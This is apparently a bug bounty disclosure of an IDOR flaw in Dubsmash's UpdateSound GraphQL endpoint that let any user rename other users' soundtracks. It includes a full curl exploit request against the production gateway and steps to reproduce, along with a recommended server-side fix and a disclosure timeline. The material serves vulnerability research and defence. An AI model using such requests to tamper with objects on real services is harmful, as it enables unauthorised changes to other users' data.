Background:
Dubsmash, initially released in 2014, is a New York-based video-sharing social media service application for iOS and Android. On December 13, 2020, Reddit announced it had acquired Dubsmash.
Dubsmash allows users to videotape themselves while lip-syncing over soundtracks including sections of songs, movies, and famous quotes. Users have the option to select soundtracks from a vast music library that is managed by Dubsmash. Users can also upload their soundtracks to the application.
Vulnerability Description:
During the security research on the Dubsmash iOS application, I found that the UpdateSound graphql API endpoint was vulnerable to Broken Object Level Authorization security vulnerability. Broken Object Level Authorization (BOLA) occurs when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly. It is generally referred to as an insecure direct object reference or IDOR.
The application server failed to check if the supplied ‘uuid’ parameter value in the UpdateSound graphql API endpoint belongs to the logged-in user or not. Benefitting from this security vulnerability, the attackers would have been able to change any soundtrack’s title using the soundtrack UUID. Soundtrack UUID is publicly known.
Original Report Link: https://hackerone.com/reports/1102365
Vulnerable Request:
curl -i -s -k -X $'POST' \-H $'Host: gateway-production.dubsmash.com' -H $'X-Dmac: ' -H $'X-Remote-Config-Values: []' -H $'X-Time: 1613158267' -H $'User-Agent: Dopesmash/5.20.0 (com.mobilemotion.dubsmash; build:45431; iOS 14.0.1) Alamofire/5.4.0' -H $'X-Accept-Content-Language: en_IN' -H $'X-Device-Timezone: 19800' -H $'X-Device-Language: en' -H $'X-Device-Country: IN' -H $'X-Build-Number: 45431' -H $'Content-Length: 676' -H $'X-App-Version: 5.20.0' -H $'X-Platform: ios' -H $'Connection: close' -H $'Authorization: Bearer XXXXXX' -H $'X-Dubsmash-Device-Id: 0675382B-668E-4EB7-8313-ED96BC132DC9' -H $'Accept-Language: en-IN;q=1.0, hi-IN;q=0.9' -H $'Accept: application/json' -H $'Content-Type: application/json' -H $'X-Dmac-Version: 2' -H $'If-None-Match: W/\"88-IVjhmW06Njcacim4nwHnJNviYsE\"' \-b $'cfduid=' \--data-binary $'{\"query\":\"mutation UpdateSound($input: UpdateSoundInput!) {\n updateSound(input: $input) {\n typename\n sound {\n typename\n ...SoundFragment\n }\n }\n}\nfragment SoundFragment on Sound {\n typename\n uuid\n created_at\n sound\n name\n waveform_raw_data\n liked\n soundStatus: status\n creator {\n typename\n ...ContentCreatorFragment\n }\n share_link\n num_likes\n num_videos\n}\nfragment ContentCreatorFragment on User {\n typename\n username\n uuid\n date_joined\n followed\n has_invite_badge\n badges\n profile_picture\n}\",\"variables\":{\"input\":{\"uuid\":\"a687eb61ad814a09a8a85cedef7837f3\",\"name\":\"test12355556777\"}}}' \$'https://gateway-production.dubsmash.com/graphql?build_number=45431&platform=ios'
Steps to Reproduce:
- Uploaded a sound track in Dubsmash iOS app under ‘My Sounds’ section.
- Edited the Sound title and captured the vulnerable graphql HTTP request in the burp suite.
- Changed the ‘uuid’ parameter value with some another sound track’s uuid. Sound track UUID is disclosed in the response of multiple API.
- Forwarded the request to the server. The sound track title was changed.
Impact:
The attacker would have been able to change any soundtrack’s title using the soundtrack UUID as it is publicly known. Moreover, it was possible to change the entire music library soundtracks’ titles using an automated script.
Recommended Fix:
I’ve recommended implementing an authorization check on the ‘uuid’ parameter of the vulnerable UpdateSound API endpoint. This is done by verifying the ‘uuid’ parameter value with the logged-in user session token on the server-side.
Timeline:
13 Feb, 2021: Report submitted on Reddit’s bug bounty program
22 Feb, 2021: Reddit’s security team requested for more information
22 Feb, 2021: I’ve shared additional details with the Reddit’s security team
24 Feb, 2021: Reddit’s security team Triaged the submission
1 Mar, 2021: Reddit’s team confirms issue resolution and rewarded $3000 in bounty
